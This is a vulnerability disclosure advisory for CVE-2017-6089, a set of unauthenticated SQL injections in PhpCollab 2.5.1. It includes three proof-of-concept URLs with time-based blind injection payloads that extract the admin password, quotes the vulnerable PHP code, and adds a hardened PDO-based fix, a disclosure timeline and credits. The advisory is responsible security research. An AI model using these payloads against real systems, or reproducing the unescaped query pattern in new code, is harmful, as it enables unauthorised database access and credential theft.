[CVE-2017-6089] PhpCollab 2.5.1 Multiple SQL Injections (unauthenticated)
PhpCollab is an open source web-based project management system that enables collaboration across the Internet.
We found an SQL injection in the application.
Description
SQL injections
The phpCollab code does not validate or escape request parameters before concatenating them into SQL queries, allowing arbitrary SQL code execution by an unauthenticated user.
CVE ID: CVE-2017-6089
Access Vector: remote
Security Risk: Critical
Vulnerability: CWE-89
CVSS Base Score: 10 (Critical)
CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H
Proof of Concept 1
The following HTTP requests allow an attacker to extract data using SQL injection in either the project or the id parameter (they require at least one topic):
http://phpCollab.lan/topics/deletetopics.php?project=1'+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))+and+'2'='2
http://phpCollab.lan/topics/deletetopics.php?project=1&id=1+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))
Vulnerable code
The vulnerable code is found in topics/deletetopics.php, line 9.
if ($action == "delete") {
    // $id comes straight from the request; "**" is the application's multi-id separator
    $id = str_replace("**",",",$id);
    // $id is interpolated unquoted into both queries: this is the injection point
    $tmpquery1 = "DELETE FROM ".$tableCollab["topics"]." WHERE id = $id";
    $tmpquery2 = "DELETE FROM ".$tableCollab["posts"]." WHERE topic = $id";
    $pieces = explode(",",$id);
    $num = count($pieces);
    connectSql("$tmpquery1");
    connectSql("$tmpquery2");
    // ... rest of the handler omitted
}
Proof of Concept 2
The following HTTP request allows an attacker to extract data using SQL injection in the id parameter (it requires at least one saved bookmark):
http://phpCollab.lan/bookmarks/deletebookmarks.php?action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)
Vulnerable code
The vulnerable code is found in bookmarks/deletebookmarks.php, line 32.
if ($action == "delete") {
    // $id comes straight from the request; "**" is the application's multi-id separator
    $id = str_replace("**",",",$id);
    // $id is interpolated unquoted into the IN() list: this is the injection point
    $tmpquery1 = "DELETE FROM ".$tableCollab["bookmarks"]." WHERE id IN($id)";
    connectSql("$tmpquery1");
    // ... rest of the handler omitted
}
Proof of Concept 3
The following HTTP request allows an attacker to extract some information using SQL injection in the id parameter (it requires at least one calendar entry):
http://phpCollab.lan/calendar/deletecalendar.php?project=&action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)
Vulnerable code
The vulnerable code is found in calendar/deletecalendar.php, line 31.
if ($action == "delete") {
    // $id comes straight from the request; "**" is the application's multi-id separator
    $id = str_replace("**",",",$id);
    // $id is interpolated unquoted into the IN() list: this is the injection point
    $tmpquery1 = "DELETE FROM ".$tableCollab["calendar"]." WHERE id IN($id)";
    connectSql("$tmpquery1");
    // ... rest of the handler omitted
}
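As an added example (not phpCollab's code), the following hardened handler shows how the three delete actions above could be fixed: it keeps the "**"-separated id convention but whitelists every id as an integer and binds the values through PDO placeholders instead of interpolating them. The function names, the in-memory SQLite database and the sample rows are constructed for the demo; PDO with the SQLite driver is assumed to be available.

```php
<?php
// Added example, not phpCollab code: hardened replacement for the
// "action == delete" handlers. Table names such as $tableCollab["topics"]
// are application-controlled constants, never user input.
declare(strict_types=1);

function parseIdList(string $raw): array
{
    $ids = [];
    foreach (explode('**', $raw) as $piece) {
        // Whitelist: only unsigned decimal integers survive. Quotes, spaces,
        // keywords and an empty piece all cause the whole request to be refused.
        if (preg_match('/\A[0-9]+\z/', $piece) !== 1) {
            throw new InvalidArgumentException("Invalid id: $piece");
        }
        $ids[] = (int) $piece;
    }
    return $ids;
}

function deleteByIds(PDO $db, string $table, array $ids): int
{
    // One placeholder per id; values travel separately from the SQL text,
    // so the database never parses them as code.
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare("DELETE FROM $table WHERE id IN ($placeholders)");
    $stmt->execute($ids);
    return $stmt->rowCount();
}

// Demo on a constructed in-memory SQLite database.
$db = new PDO('sqlite::memory:', null, null,
    [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE bookmarks (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO bookmarks VALUES (1,'a'),(2,'b'),(3,'c')");

// Legitimate multi-id request, as the application would build it.
$deleted = deleteByIds($db, 'bookmarks', parseIdList('1**3'));
echo "Deleted $deleted bookmark(s)\n";

// The time-based payload from the proof of concept is rejected before any SQL runs.
try {
    parseIdList('select sleep(5) from members where login like 0x61646d696e');
} catch (InvalidArgumentException $e) {
    echo 'Rejected: ', $e->getMessage(), "\n";
}
```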
Notes
The application appears to lack a general defence against injections, so other parameters and pages may be vulnerable. This advisory is not intended to be an exhaustive list of vulnerable parameters.
Solution
Update to the latest version available.
Affected versions
- Version <= 2.5.1
Timeline (dd/mm/yyyy)
- 27/08/2016 : Initial discovery.
- 05/10/2016 : Initial contact.
- 11/10/2016 : GPG Key exchange.
- 19/10/2016 : Advisory sent to vendor.
- 13/02/2017 : First fixes.
- 15/02/2017 : Fixes validation by Sysdream.
- 21/02/2017 : PhpCollab asked to wait before publication.
- 21/06/2017 : New version released.
- 29/09/2017 : Public disclosure.
Credits
- Nicolas SERRA, Sysdream (n.serra -at- sysdream -dot- com)